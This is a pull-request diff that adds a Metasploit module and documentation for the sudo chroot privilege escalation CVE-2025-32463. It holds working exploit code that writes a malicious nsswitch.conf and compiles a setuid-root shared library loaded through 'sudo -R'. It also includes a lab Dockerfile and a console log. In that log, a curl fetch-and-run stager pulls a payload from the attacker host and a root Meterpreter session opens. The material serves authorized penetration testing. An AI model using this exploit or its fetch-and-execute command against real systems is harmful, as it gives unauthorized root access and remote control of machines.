### PR TITLE
Adds module for sudo chroot LPE (CVE-2025-32463)

### DIFF
--- a/documentation/modules/exploit/linux/local/sudo_chroot_cve_2025_32463.md
+++ b/documentation/modules/exploit/linux/local/sudo_chroot_cve_2025_32463.md
@@ -3,14 +3,36 @@
 
 Sudo before version 1.9.14-1.9.17p1 allows user to use `chroot` option, when executing command. The option is intended to run a command with user-selected root directory (if sudoers file allow it). Change in version 1.9.14 allows resolving paths via `chroot` using user-specified root directory when sudoers is still evaluating. This allows the attacker to trick Sudo into loading arbitrary shared object. As target shared object, Name Service Switch (NSS) operations are trigged before resolving sudoers, but after running `chroot` syscall. The module requires existing session and requires compiler on target machine (e.g. `gcc`). 
 
-Installation of vulnerable sudo:
+## Installation
 
+1. Create `Dockerfile`:
 ```
-wget https://www.sudo.ws/dist/sudo-1.9.16p2.tar.gz && \
+# ----- Dockerfile -----
+FROM ubuntu:24.04
+
+ENV DEBIAN_FRONTEND=noninteractive
+
+RUN apt-get update && \
+    apt-get install -y build-essential wget libpam0g-dev libselinux1-dev zlib1g-dev \
+                       pkg-config libssl-dev git ca-certificates && \
+    rm -rf /var/lib/apt/lists/*
+
+WORKDIR /opt
+RUN wget https://www.sudo.ws/dist/sudo-1.9.16p2.tar.gz && \
     tar xzf sudo-1.9.16p2.tar.gz && \
     cd sudo-1.9.16p2 && \
     ./configure --disable-gcrypt --prefix=/usr && make && make install
+
+RUN useradd -m -s /bin/bash msfuser
+
+USER msfuser
+WORKDIR /home/msfuser
+
+CMD ["/bin/bash"]
 ```
+1. `docker build -t sudo-chroot .`
+1. `docker run -it --rm --privileged sudo-chroot`
+
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/linux/local/sudo_chroot_cve_2025_32463.md
+++ b/documentation/modules/exploit/linux/local/sudo_chroot_cve_2025_32463.md
@@ -1,29 +1,31 @@
 ## Vulnerable Application
 
-Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
-files, as well as instructions on installing/configuring the environment if it is different than a
-standard install. Much of this will come from the PR, and can be copy/pasted.
+
+Sudo before version 1.19.17p1 allows user to use `chroot` option, when executing command. The option is intended to run a command with user-selected root directory (if sudoers file allow it). Change in version 1.9.14 allows resolving paths via `chroot` using user-specified root directory when sudoers is still evaluating. This allows the attacker to trick Sudo into loading arbitrary shared object. As target shared object, Name Service Switch (NSS) operations are trigged before resolving sudoers, but after running `chroot` syscall. The module requires existing session and requires compiler on target machine (e.g. `gcc`). 
 
 ## Verification Steps
-Example steps in this format (is also in the PR):
 
-1. Install the application
+
 1. Start msfconsole
-1. Do: `use [module path]`
-1. Do: `run`
-1. You should get a shell.
+2. Get existing session to low-privileged user
+3. Do: `use linux/local/sudo_chroot_cve_2025_32463`
+4. Set target payload
+5. Do: `set lhost [attacker IP address]`
+6. Do: `set lport [attacker port]`
+7. Do: `run`
 
 ## Options
-List each option and how to use it.
 
-### Option Name
+### COMPILE
 
-Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
+Option setting if compile target payload on the target.
+
+### COMPILER
+
+Option setting the compiler to compile target payload.
+
 
 ## Scenarios
-Specific demo of using the module that might be useful in a real world scenario.
-
-### Version and OS
 
 ```
 msf6 exploit(linux/local/sudo_chroot_cve_2025_32463) > run verbose=true 

--- a/documentation/modules/exploit/linux/local/sudo_chroot_cve_2025_32463.md
+++ b/documentation/modules/exploit/linux/local/sudo_chroot_cve_2025_32463.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
 
-Sudo before version 1.19.17p1 allows user to use `chroot` option, when executing command. The option is intended to run a command with user-selected root directory (if sudoers file allow it). Change in version 1.9.14 allows resolving paths via `chroot` using user-specified root directory when sudoers is still evaluating. This allows the attacker to trick Sudo into loading arbitrary shared object. As target shared object, Name Service Switch (NSS) operations are trigged before resolving sudoers, but after running `chroot` syscall. The module requires existing session and requires compiler on target machine (e.g. `gcc`). 
+Sudo before version 1.9.14-1.9.17p1 allows user to use `chroot` option, when executing command. The option is intended to run a command with user-selected root directory (if sudoers file allow it). Change in version 1.9.14 allows resolving paths via `chroot` using user-specified root directory when sudoers is still evaluating. This allows the attacker to trick Sudo into loading arbitrary shared object. As target shared object, Name Service Switch (NSS) operations are trigged before resolving sudoers, but after running `chroot` syscall. The module requires existing session and requires compiler on target machine (e.g. `gcc`). 
 
 Installation of vulnerable sudo:
 

--- a/documentation/modules/exploit/linux/local/sudo_chroot_cve_2025_32463.md
+++ b/documentation/modules/exploit/linux/local/sudo_chroot_cve_2025_32463.md
@@ -1,0 +1,61 @@
+## Vulnerable Application
+
+Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
+files, as well as instructions on installing/configuring the environment if it is different than a
+standard install. Much of this will come from the PR, and can be copy/pasted.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use [module path]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+List each option and how to use it.
+
+### Option Name
+
+Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
+
+## Scenarios
+Specific demo of using the module that might be useful in a real world scenario.
+
+### Version and OS
+
+```
+msf6 exploit(linux/local/sudo_chroot_cve_2025_32463) > run verbose=true 
+[*] Command to run on remote host: curl -so ./YoGpAgWbO http://192.168.168.128:8080/Q7JGOkCYlO14PhxIQeJRIQ;chmod +x ./YoGpAgWbO;./YoGpAgWbO&
+[*] Fetch handler listening on 192.168.168.128:8080
+[*] HTTP server started
+[*] Adding resource /Q7JGOkCYlO14PhxIQeJRIQ
+[*] Started reverse TCP handler on 192.168.168.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Running version 1.9.16.2
+[*] Writing '/tmp/Xw1XwkTPC' (117 bytes) ...
+[*] Max line length is 65537
+[*] Writing 117 bytes in 1 chunks of 420 bytes (octal-encoded), using printf
+[*] Creating directory /tmp/ugJjJFSc9q
+[*] /tmp/ugJjJFSc9q created
+[*] Max line length is 65537
+[*] Writing 216 bytes in 1 chunks of 763 bytes (octal-encoded), using printf
+[*] Client 192.168.168.140 requested /Q7JGOkCYlO14PhxIQeJRIQ
+[*] Sending payload to 192.168.168.140 (curl/8.14.1)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Launching exploit...
+[*] Sending stage (3090404 bytes) to 192.168.168.140
+[+] Deleted /tmp/Xw1XwkTPC
+[+] Deleted /tmp/ugJjJFSc9q
+[*] Meterpreter session 10 opened (192.168.168.128:4444 -> 192.168.168.140:41672) at 2025-07-10 16:12:58 +0200
+
+meterpreter > sysinfo 
+Computer     : kali.kali
+OS           : Debian  (Linux 6.12.25-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+```

--- a/documentation/modules/exploit/linux/local/sudo_chroot_cve_2025_32463.md
+++ b/documentation/modules/exploit/linux/local/sudo_chroot_cve_2025_32463.md
@@ -3,6 +3,15 @@
 
 Sudo before version 1.19.17p1 allows user to use `chroot` option, when executing command. The option is intended to run a command with user-selected root directory (if sudoers file allow it). Change in version 1.9.14 allows resolving paths via `chroot` using user-specified root directory when sudoers is still evaluating. This allows the attacker to trick Sudo into loading arbitrary shared object. As target shared object, Name Service Switch (NSS) operations are trigged before resolving sudoers, but after running `chroot` syscall. The module requires existing session and requires compiler on target machine (e.g. `gcc`). 
 
+Installation of vulnerable sudo:
+
+```
+wget https://www.sudo.ws/dist/sudo-1.9.16p2.tar.gz && \
+    tar xzf sudo-1.9.16p2.tar.gz && \
+    cd sudo-1.9.16p2 && \
+    ./configure --disable-gcrypt --prefix=/usr && make && make install
+```
+
 ## Verification Steps
 
 

--- a/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
+++ b/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
@@ -125,9 +125,9 @@ class MetasploitModule < Msf::Exploit::Local
 
     cmd_exec("mkdir -p #{base_dir}/etc libnss_")
 
-    cmd_exec(%(echo "passwd: /#{lib_filename}" \> #{base_dir}/etc/nsswitch.conf))
+    return Failure::PayloadFailed, 'Failed to create malicious nsswitch.conf file' unless write_file("#{base_dir}/etc/nsswitch.conf", "passwd: /#{lib_filename}\n")
 
-    cmd_exec("cp /etc/group #{base_dir}/etc")
+    return Failure::PayloadFailed, 'Failed to copy /etc/group' unless copy_file('/etc/group', "#{base_dir}/etc/group")
 
     exploit_code = %<
     #include <stdlib.h>

--- a/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
+++ b/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
@@ -2,8 +2,6 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-require 'pry'
-require 'pry-byebug'
 
 class MetasploitModule < Msf::Exploit::Local
   Rank = NormalRanking

--- a/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
+++ b/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Local
 
         'Arch' => [ ARCH_CMD ],
 
-        # chmod has some issues for meterpreter, forcing shell
+        # mkdir/chmod has some issues for meterpreter, forcing shell
         'SessionTypes' => [ 'shell' ],
 
         'Targets' => [[ 'Auto', {} ]],

--- a/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
+++ b/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
@@ -21,8 +21,13 @@ class MetasploitModule < Msf::Exploit::Local
         info,
         'Name' => 'Sudo Chroot 1.9.17 Privilege Escalation',
         'Description' => %q{
-          This exploit module illustrates how a vulnerability could be exploited
-          in an linux command for priv esc.
+          Sudo before version 1.19.17p1 allows user to use `chroot` option, when
+          executing command. The option is intended to run a command with
+          user-selected root directory (if sudoers file allow it). Change in version
+          1.9.14 allows resolving paths via `chroot` using user-specified root
+          directory when sudoers is still evaluating.
+          This allows the attacker to trick Sudo into loading arbitrary shared object,
+          thus resulting in a privilege escalation.
         },
         'License' => MSF_LICENSE,
 
@@ -105,11 +110,9 @@ class MetasploitModule < Msf::Exploit::Local
 
     existing_shell = cmd_exec('echo $0 || echo ${SHELL}')
 
-    # puts existing_shell
-
     return Failure::NotFound, 'Could not find shell' unless file?(existing_shell)
 
-    upload_and_chmodx("#{datastore['WritableDir']}/#{payload_file}", "#!#{existing_shell}\n" + payload.encoded)
+    upload_and_chmodx("#{datastore['WritableDir']}/#{payload_file}", "#!#{existing_shell}\n#{payload.encoded}")
 
     register_files_for_cleanup("#{datastore['WritableDir']}/#{payload_file}")
 
@@ -123,14 +126,14 @@ class MetasploitModule < Msf::Exploit::Local
 
     cd(temp_dir)
 
-    cmd_exec("mkdir -p #{base_dir}/etc libnss_")
+    mkdir("#{base_dir}/etc")
+    mkdir('libnss_')
 
     return Failure::PayloadFailed, 'Failed to create malicious nsswitch.conf file' unless write_file("#{base_dir}/etc/nsswitch.conf", "passwd: /#{lib_filename}\n")
 
     return Failure::PayloadFailed, 'Failed to copy /etc/group' unless copy_file('/etc/group', "#{base_dir}/etc/group")
 
     exploit_code = %<
-    #include <stdlib.h>
     #include <unistd.h>
 
     __attribute__((constructor))
@@ -138,7 +141,8 @@ class MetasploitModule < Msf::Exploit::Local
       setreuid(0,0);
       setregid(0,0);
       chdir("/");
-      execve("#{datastore['WritableDir']}/#{payload_file}",NULL,NULL); /* root shell */
+      execve("#{datastore['WritableDir']}/#{payload_file}",NULL,NULL);
+
     }>
 
     upload_and_compile("#{temp_dir}/libnss_/#{lib_filename}.so.2", exploit_code, "-shared -fPIC -Wl,-init,#{base_dir}")

--- a/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
+++ b/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
@@ -6,7 +6,6 @@
 class MetasploitModule < Msf::Exploit::Local
   Rank = NormalRanking
 
-  include Msf::Post::File
   include Msf::Post::Linux::Priv
   include Msf::Post::Linux::System
   include Msf::Post::Linux::Compile

--- a/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
+++ b/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
@@ -2,6 +2,8 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
+require 'pry'
+require 'pry-byebug'
 
 class MetasploitModule < Msf::Exploit::Local
   Rank = NormalRanking
@@ -40,8 +42,8 @@ class MetasploitModule < Msf::Exploit::Local
 
         'Arch' => [ ARCH_CMD ],
 
-        # mkdir/chmod has some issues for meterpreter, forcing shell
-        'SessionTypes' => [ 'shell' ],
+        # chmod has some issues for meterpreter, forcing shell
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
 
         'Targets' => [[ 'Auto', {} ]],
 
@@ -111,7 +113,10 @@ class MetasploitModule < Msf::Exploit::Local
 
     cd(temp_dir)
 
+    mkdir(base_dir.to_s)
+
     mkdir("#{base_dir}/etc")
+
     mkdir('libnss_')
 
     return Failure::PayloadFailed, 'Failed to create malicious nsswitch.conf file' unless write_file("#{base_dir}/etc/nsswitch.conf", "passwd: /#{lib_filename}\n")

--- a/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
+++ b/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
@@ -1,0 +1,167 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+# This exploit sample shows how an exploit module could be written to exploit
+# a bug in a command on a linux computer for priv esc.
+#
+###
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Compile
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        # The Name should be just like the line of a Git commit - software name,
+        # vuln type, class. Preferably apply
+        # some search optimization so people can actually find the module.
+        # We encourage consistency between module name and file name.
+        'Name' => 'Sudo Chroot 1.9.17 Privilege Escalation',
+        'Description' => %q{
+          This exploit module illustrates how a vulnerability could be exploited
+          in an linux command for priv esc.
+        },
+        'License' => MSF_LICENSE,
+        # The place to add your name/handle and email.  Twitter and other contact info isn't handled here.
+        # Add reference to additional authors, like those creating original proof of concepts or
+        # reference materials.
+        # It is also common to comment in who did what (PoC vs metasploit module, etc)
+        'Author' => [
+          'h00die <mike@stcyrsecurity.com>', # msf module
+          'researcher' # original PoC, analysis
+        ],
+        'Platform' => [ 'linux' ],
+        # from underlying architecture of the system.  typically ARCH_X64 or ARCH_X86, but the exploit
+        # may only apply to say ARCH_PPC or something else, where a specific arch is required.
+        # A full list is available in lib/msf/core/payload/uuid.rb
+        'Arch' => [ ARCH_CMD ],
+        # What types of sessions we can use this module in conjunction with.  Most modules use libraries
+        # which work on shell and meterpreter, but there may be a nuance between one of them, so best to
+        # test both to ensure compatibility.
+        'SessionTypes' => [ 'shell' ],
+        'Targets' => [[ 'Auto', {} ]],
+        # from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
+        # since privilege escalation modules typically result in elevated privileges, this is
+        # generally set to true
+        'Privileged' => true,
+        'References' => [
+          [ 'OSVDB', '12345' ],
+          [ 'EDB', '12345' ],
+          [ 'URL', 'http://www.example.com'],
+          [ 'CVE', '1978-1234']
+        ],
+        'DisclosureDate' => '2023-11-29',
+        # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
+        # It's generally easiest just to put the default at the beginning of the list and skip this
+        # entirely.
+        'DefaultTarget' => 0,
+        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    # force exploit is used to bypass the check command results
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+
+    ]
+  end
+
+  def check
+    return CheckCode::Appears('Vulnerable app version detected')
+    # Check the kernel version to see if its in a vulnerable range
+    # we guard this because some distros have funky kernel versions https://github.com/rapid7/metasploit-framework/issues/19812
+    #    release = kernel_release
+    #    begin
+    #      if Rex::Version.new(release.split('-').first) > Rex::Version.new('4.14.11') ||
+    #         Rex::Version.new(release.split('-').first) < Rex::Version.new('4.0')
+    #        return CheckCode::Safe("Kernel version #{release} is not vulnerable")
+    #      end
+    #    rescue ArgumentError => e
+    #      return CheckCode::Safe("Error determining or processing kernel release (#{release}) into known format: #{e}")
+    #    end
+    #    vprint_good "Kernel version #{release} appears to be vulnerable"
+    #
+    #    # Check the app is installed and the version, debian based example
+    #    package = cmd_exec('dpkg -l example | grep \'^ii\'')
+    #    if package&.include?('1:2015.3.14AR.1-1build1')
+    #      return CheckCode::Appears("Vulnerable app version #{package} detected")
+    #    end
+    #
+    #    CheckCode::Safe("app #{package} is not vulnerable")
+  end
+
+  #
+  # The exploit method drops a payload file to the system, then either compiles and runs
+  # or just runs the exploit on the system.
+  #
+  def exploit
+    # Check if we're already root
+    if !datastore['ForceExploit'] && is_root?
+      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
+    end
+
+    fil_with Failure::NotFound, 'Module needs to compile payload on target machine' unless live_compile?
+
+    payload_file = rand_text_alphanumeric(5..10)
+
+    upload_and_chmodx("#{datastore['WritableDir']}/#{payload_file}", "#!/bin/bash\n" + payload.encoded)
+
+    register_files_for_cleanup("#{datastore['WritableDir']}/#{payload_file}")
+
+    temp_dir = "#{datastore['WritableDir']}/#{rand_text_alphanumeric(5..10)}"
+
+    base_dir = rand_text_alphanumeric(5..10)
+
+    lib_filename = rand_text_alphanumeric(5..10)
+
+    mkdir(temp_dir)
+
+    cd(temp_dir)
+
+    cmd_exec("mkdir -p #{base_dir}/etc libnss_")
+
+    cmd_exec(%(echo "passwd: /#{lib_filename}" \> #{base_dir}/etc/nsswitch.conf))
+
+    cmd_exec("cp /etc/group #{base_dir}/etc")
+
+    exploit_code = %<
+    #include <stdlib.h>
+    #include <unistd.h>
+
+    __attribute__((constructor))
+    void exploit(void) {
+      setreuid(0,0);
+      setregid(0,0);
+      chdir("/");
+      execve("#{datastore['WritableDir']}/#{payload_file}",NULL,NULL); /* root shell */
+    }>
+
+    upload_and_compile("#{temp_dir}/libnss_/#{lib_filename}.so.2", exploit_code, "-shared -fPIC -Wl,-init,#{base_dir}")
+
+    cmd_exec("sudo -R #{base_dir} #{base_dir}")
+
+    timeout = 30
+    print_status 'Launching exploit...'
+    output = cmd_exec 'command', nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+  end
+end

--- a/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
+++ b/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
@@ -53,8 +53,8 @@ class MetasploitModule < Msf::Exploit::Local
 
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'Reliability' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
-          'SideEffects' => [REPEATABLE_SESSION]
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
         }
       )
     )

--- a/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
+++ b/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Linux::Priv
   include Msf::Post::Linux::System
   include Msf::Post::Linux::Compile
+  include Msf::Post::Linux::Packages
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 
@@ -70,26 +71,12 @@ class MetasploitModule < Msf::Exploit::Local
     ]
   end
 
-  # borrowed from exploits/linux/local/sudo_baron_samedit.rb
-  def get_versions
-    versions = {}
-    output = cmd_exec('sudo --version')
-    if output
-      version = output.split("\n").first.split(' ').last
-      versions[:sudo] = version if version =~ /^\d/
-    end
-    versions
-  end
-
   def check
-    sudo_version = get_versions[:sudo]
+    sudo_version = installed_package_version('sudo')
 
-    return CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.nil?
+    return CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.blank?
 
     return CheckCode::Safe if !file?('/etc/nsswitch.conf')
-
-    # as `sudo --version` returns the version in format `[version]p[minor version?]`, we need to remove the `p` character.
-    sudo_version.gsub!(/p/, '.')
 
     return CheckCode::Appears("Running version #{sudo_version}") if Rex::Version.new(sudo_version).between?(Rex::Version.new('1.9.14'), Rex::Version.new('1.9.17'))
 

--- a/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
+++ b/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
@@ -3,18 +3,11 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-###
-#
-# This exploit sample shows how an exploit module could be written to exploit
-# a bug in a command on a linux computer for priv esc.
-#
-###
 class MetasploitModule < Msf::Exploit::Local
-  Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
+  Rank = NormalRanking
 
   include Msf::Post::File
   include Msf::Post::Linux::Priv
-  include Msf::Post::Linux::Kernel
   include Msf::Post::Linux::System
   include Msf::Post::Linux::Compile
   include Msf::Exploit::EXE
@@ -26,54 +19,42 @@ class MetasploitModule < Msf::Exploit::Local
     super(
       update_info(
         info,
-        # The Name should be just like the line of a Git commit - software name,
-        # vuln type, class. Preferably apply
-        # some search optimization so people can actually find the module.
-        # We encourage consistency between module name and file name.
         'Name' => 'Sudo Chroot 1.9.17 Privilege Escalation',
         'Description' => %q{
           This exploit module illustrates how a vulnerability could be exploited
           in an linux command for priv esc.
         },
         'License' => MSF_LICENSE,
-        # The place to add your name/handle and email.  Twitter and other contact info isn't handled here.
-        # Add reference to additional authors, like those creating original proof of concepts or
-        # reference materials.
-        # It is also common to comment in who did what (PoC vs metasploit module, etc)
+
         'Author' => [
-          'h00die <mike@stcyrsecurity.com>', # msf module
-          'researcher' # original PoC, analysis
+          'msutovsky-r7', # module dev
+          'Stratascale', # poc dev
+          'Rich Mirch' # security research
         ],
         'Platform' => [ 'linux' ],
-        # from underlying architecture of the system.  typically ARCH_X64 or ARCH_X86, but the exploit
-        # may only apply to say ARCH_PPC or something else, where a specific arch is required.
-        # A full list is available in lib/msf/core/payload/uuid.rb
+
         'Arch' => [ ARCH_CMD ],
-        # What types of sessions we can use this module in conjunction with.  Most modules use libraries
-        # which work on shell and meterpreter, but there may be a nuance between one of them, so best to
-        # test both to ensure compatibility.
+
+        # chmod has some issues for meterpreter, forcing shell
         'SessionTypes' => [ 'shell' ],
+
         'Targets' => [[ 'Auto', {} ]],
-        # from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
-        # since privilege escalation modules typically result in elevated privileges, this is
-        # generally set to true
+
         'Privileged' => true,
+
         'References' => [
-          [ 'OSVDB', '12345' ],
-          [ 'EDB', '12345' ],
-          [ 'URL', 'http://www.example.com'],
-          [ 'CVE', '1978-1234']
+          [ 'EDB', '52352' ],
+          [ 'URL', 'https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/'],
+          [ 'CVE', '2025-32463']
         ],
-        'DisclosureDate' => '2023-11-29',
-        # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
-        # It's generally easiest just to put the default at the beginning of the list and skip this
-        # entirely.
+        'DisclosureDate' => '2025-06-30',
+
         'DefaultTarget' => 0,
-        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
+
         'Notes' => {
-          'Stability' => [],
-          'Reliability' => [],
-          'SideEffects' => []
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'SideEffects' => [REPEATABLE_SESSION]
         }
       )
     )
@@ -85,41 +66,39 @@ class MetasploitModule < Msf::Exploit::Local
     ]
   end
 
-  def check
-    return CheckCode::Appears('Vulnerable app version detected')
-    # Check the kernel version to see if its in a vulnerable range
-    # we guard this because some distros have funky kernel versions https://github.com/rapid7/metasploit-framework/issues/19812
-    #    release = kernel_release
-    #    begin
-    #      if Rex::Version.new(release.split('-').first) > Rex::Version.new('4.14.11') ||
-    #         Rex::Version.new(release.split('-').first) < Rex::Version.new('4.0')
-    #        return CheckCode::Safe("Kernel version #{release} is not vulnerable")
-    #      end
-    #    rescue ArgumentError => e
-    #      return CheckCode::Safe("Error determining or processing kernel release (#{release}) into known format: #{e}")
-    #    end
-    #    vprint_good "Kernel version #{release} appears to be vulnerable"
-    #
-    #    # Check the app is installed and the version, debian based example
-    #    package = cmd_exec('dpkg -l example | grep \'^ii\'')
-    #    if package&.include?('1:2015.3.14AR.1-1build1')
-    #      return CheckCode::Appears("Vulnerable app version #{package} detected")
-    #    end
-    #
-    #    CheckCode::Safe("app #{package} is not vulnerable")
+  # borrowed from exploits/linux/local/sudo_baron_samedit.rb
+  def get_versions
+    versions = {}
+    output = cmd_exec('sudo --version')
+    if output
+      version = output.split("\n").first.split(' ').last
+      versions[:sudo] = version if version =~ /^\d/
+    end
+    versions
   end
 
-  #
-  # The exploit method drops a payload file to the system, then either compiles and runs
-  # or just runs the exploit on the system.
-  #
+  def check
+    sudo_version = get_versions[:sudo]
+
+    return CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.nil?
+
+    return CheckCode::Safe if !file?('/etc/nsswitch.conf')
+
+    sudo_version.gsub!(/p/, '.')
+
+    return CheckCode::Appears("Running version #{sudo_version}") if Rex::Version.new(sudo_version).between?(Rex::Version.new('1.9.14'), Rex::Version.new('1.9.17'))
+
+    CheckCode::Safe('Sudo is not vulnerable')
+  end
+
   def exploit
     # Check if we're already root
     if !datastore['ForceExploit'] && is_root?
       fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
     end
 
-    fil_with Failure::NotFound, 'Module needs to compile payload on target machine' unless live_compile?
+    # needs to compile in real-time to adjust payload execution path
+    fail_with Failure::NotFound, 'Module needs to compile payload on target machine' unless live_compile?
 
     payload_file = rand_text_alphanumeric(5..10)
 

--- a/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
+++ b/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
@@ -67,7 +67,6 @@ class MetasploitModule < Msf::Exploit::Local
     # force exploit is used to bypass the check command results
     register_advanced_options [
       OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
-
     ]
   end
 
@@ -89,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     return CheckCode::Safe if !file?('/etc/nsswitch.conf')
 
-    # as sudo --version returns the version in format [version]p[minor version?], so this removes p
+    # as `sudo --version` returns the version in format `[version]p[minor version?]`, we need to remove the `p` character.
     sudo_version.gsub!(/p/, '.')
 
     return CheckCode::Appears("Running version #{sudo_version}") if Rex::Version.new(sudo_version).between?(Rex::Version.new('1.9.14'), Rex::Version.new('1.9.17'))
@@ -139,8 +138,6 @@ class MetasploitModule < Msf::Exploit::Local
     __attribute__((constructor))
     void exploit(void) {
       setreuid(0,0);
-      setregid(0,0);
-      chdir("/");
       execve("#{datastore['WritableDir']}/#{payload_file}",NULL,NULL);
 
     }>

--- a/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
+++ b/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
@@ -69,8 +69,19 @@ class MetasploitModule < Msf::Exploit::Local
     ]
   end
 
+  # borrowed from exploits/linux/local/sudo_baron_samedit.rb
+  def get_version
+    versions = {}
+    output = cmd_exec('sudo --version')
+    if output
+      version = output.split("\n").first.split(' ').last
+      versions[:sudo] = version if version =~ /^\d/
+    end
+    versions[:sudo].gsub(/p/, '.')
+  end
+
   def check
-    sudo_version = installed_package_version('sudo')
+    sudo_version = installed_package_version('sudo') || get_version
 
     return CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.blank?
 

--- a/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
+++ b/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
@@ -42,7 +42,6 @@ class MetasploitModule < Msf::Exploit::Local
 
         'Arch' => [ ARCH_CMD ],
 
-        # chmod has some issues for meterpreter, forcing shell
         'SessionTypes' => [ 'shell', 'meterpreter' ],
 
         'Targets' => [[ 'Auto', {} ]],

--- a/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
+++ b/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
@@ -84,11 +84,12 @@ class MetasploitModule < Msf::Exploit::Local
 
     return CheckCode::Safe if !file?('/etc/nsswitch.conf')
 
+    # as sudo --version returns the version in format [version]p[minor version?], so this removes p
     sudo_version.gsub!(/p/, '.')
 
     return CheckCode::Appears("Running version #{sudo_version}") if Rex::Version.new(sudo_version).between?(Rex::Version.new('1.9.14'), Rex::Version.new('1.9.17'))
 
-    CheckCode::Safe('Sudo is not vulnerable')
+    CheckCode::Safe("Sudo #{sudo_version} is not vulnerable")
   end
 
   def exploit
@@ -102,7 +103,13 @@ class MetasploitModule < Msf::Exploit::Local
 
     payload_file = rand_text_alphanumeric(5..10)
 
-    upload_and_chmodx("#{datastore['WritableDir']}/#{payload_file}", "#!/bin/bash\n" + payload.encoded)
+    existing_shell = cmd_exec('echo $0 || echo ${SHELL}')
+
+    # puts existing_shell
+
+    return Failure::NotFound, 'Could not find shell' unless file?(existing_shell)
+
+    upload_and_chmodx("#{datastore['WritableDir']}/#{payload_file}", "#!#{existing_shell}\n" + payload.encoded)
 
